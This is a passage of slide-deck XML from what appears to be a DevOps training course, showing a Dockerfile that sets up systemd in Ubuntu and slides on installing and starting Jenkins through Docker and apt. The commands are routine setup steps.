              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN systemctl mask systemd-logind.service system-udevd.service &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl mask getty.target systemd-getty-generator</a:t>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN apt-get clean &amp;&amp;  rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*</a:t>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMD [ "/lib/systemd/systemd" ]</a:t>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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293"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573075" y="704400"/>
            <a:ext cx="7603200" cy="41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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM ubuntu:latest</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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Install systemd</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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>RUN apt-get update &amp;&amp; apt-get install -y systemd</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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Enable systemd</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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>RUN systemctl mask systemd-logind.service systemd-udevd.service &amp;&amp; \</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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    systemctl mask getty.target systemd-getty-generator</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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Clean up</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750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>RUN apt-get clean &amp;&amp; \</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1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*</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75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SzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>CMD ["/lib/systemd/systemd"]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1811" name="Google Shape;1811;p293"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="0"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a Jenkins Container</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent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5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294"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520950" y="1009200"/>
            <a:ext cx="8105400" cy="3337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sz="2600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.jenkins.io/doc/book/installing/linux/</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt update &amp;&amp; sudo apt upgrade</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt install curl</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run --privileged -it -d -p 8080:8080  oklabs/jenkins_image1</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -u root --privileged -p 8080:8080 -d jenkins/jenkins:lts</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1817" name="Google Shape;1817;p294"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="304800"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a Jenkins Container</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>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295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573075" y="704400"/>
            <a:ext cx="7603200" cy="4102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sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>curl -fsSL https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key | tee \</a:t>
            </a:r>
            <a:endParaRPr sz="15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rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  /usr/share/keyrings/jenkins-keyring.asc &gt; /dev/null</a:t>
            </a:r>
            <a:endParaRPr sz="15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t/>
            </a:r>
            <a:endParaRPr sz="15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rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>echo deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc] https://pkg.jenkins.io/debian-stable binary/ | tee /etc/apt/sources.list.d/jenkins.list &gt; /dev/null</a:t>
            </a:r>
            <a:endParaRPr sz="15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t/>
            </a:r>
            <a:endParaRPr sz="15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rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>apt-get update</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>apt-get install jenkins</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1823" name="Google Shape;1823;p295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="0"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a Jenkins Container</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>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296"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="7603200" cy="41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75"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Jenkins is created using JAVA. So thats why we need to install java in our linux operating system.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We need to install Java ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Which version Java ? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000C1A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>OpenJDK 17</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2350" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.jenkins.io/doc/book/installing/linux/</a:t>
            </a:r>
            <a:endParaRPr sz="2350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1829" name="Google Shape;1829;p296"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a Jenkins Container</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>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297"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a Jenkins Container</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1835" name="Google Shape;1835;p297"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1080575" y="1809750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3491425"/>
                <a:gridCol w="3619500"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Min Version</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Jenkins</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="400"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="000C1A"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>2.419</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>JDK</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>17</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298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="7603200" cy="4102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3750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl enable jenkins</a:t>
            </a:r>
            <a:endParaRPr sz="3750">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl start jenkins</a:t>
            </a:r>
            <a:endParaRPr sz="3750">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
